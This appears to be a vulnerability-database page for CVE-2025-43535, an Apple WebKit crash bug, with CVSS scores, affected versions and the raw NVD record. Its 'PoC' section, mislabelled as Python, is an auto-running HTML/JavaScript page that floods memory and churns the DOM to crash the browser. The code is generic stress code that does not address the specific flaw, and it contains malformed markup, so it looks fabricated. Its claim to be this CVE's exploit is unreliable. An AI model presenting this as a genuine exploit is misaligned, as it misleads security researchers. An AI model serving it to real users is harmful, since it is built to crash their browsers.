Security Vulnerability Report
中文
CVE-2025-43535 CVSS 4.3 MEDIUM

CVE-2025-43535

Published: 2025-12-17 21:16:12
Last Modified: 2025-12-18 19:34:57
Source: [email protected]

Description

The issue was addressed with improved memory handling. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
Apple Safari < 26.2
Apple iOS < 18.7.3
Apple iOS < 26.2
Apple iPadOS < 18.7.3
Apple iPadOS < 26.2
Apple macOS Tahoe < 26.2
Apple visionOS < 26.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-43535 PoC - WebKit Memory Corruption leading to crash // Target: Apple Safari and WebKit-based browsers // This PoC demonstrates triggering the memory handling issue <!DOCTYPE html> <html> <head> <title>CVE-2025-43535 PoC</title> </head> <body> <h1>Memory Corruption PoC - Do not close this page</h1> <div id="status">Testing memory handling...</div> <script> // PoC for CVE-2025-43535 // This triggers memory handling issues in WebKit function triggerVulnerability() { const status = document.getElementById('status'); try { // Create memory pressure through object manipulation const objects = []; // Phase 1: Create and destroy objects rapidly for (let i = 0; i < 100000; i++) { const obj = { prop1: new Array(10000).fill(Math.random()), prop2: document.createElement('div'), prop3: new Uint8Array(50000) }; objects.push(obj); if (i % 1000 === 0) { objects.splice(0, 500); } } // Phase 2: Trigger DOM manipulation under memory pressure const container = document.createElement('div'); container.innerHTML = '<table><tbody>' + '<tr>' + '<td>' + 'A'.repeat(10000) + '</td>' + '</tr>'.repeat(100) + '</tbody></table>'; // Phase 3: Rapid attribute manipulation for (let j = 0; j < 5000; j++) { const td = container.querySelector('td'); if (td) { td.setAttribute('data-index', j); td.removeAttribute('data-index'); } } // Phase 4: Force garbage collection and crash container.innerHTML = ''; status.innerHTML = 'Vulnerability trigger attempted. Check for crash.'; } catch (e) { status.innerHTML = 'Error: ' + e.message; } } // Auto-trigger on page load window.onload = function() { setTimeout(triggerVulnerability, 1000); }; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43535", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:12.167", "lastModified": "2025-12-18T19:34:56.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was addressed with improved memory handling. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "3ECBF838-536C-47F9-9876-C526B8ED32EC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "6547722A-1226-4E23-B3AE-8692B07C2657"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "8B71D919-1AA2-4F17-A834-4B703E36F7E2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "8928A377-93BD-49AD-B4FE-5B2328EBDB70"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "10FD01C3-D77F-4FE4-8195-F2C59FB1321C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "FBA92B6D-E36C-432B-A041-94D81427CD75"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EB10D901-4800-4DF9-AB35-48017C178161"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125885", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125886", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125891", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125892", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.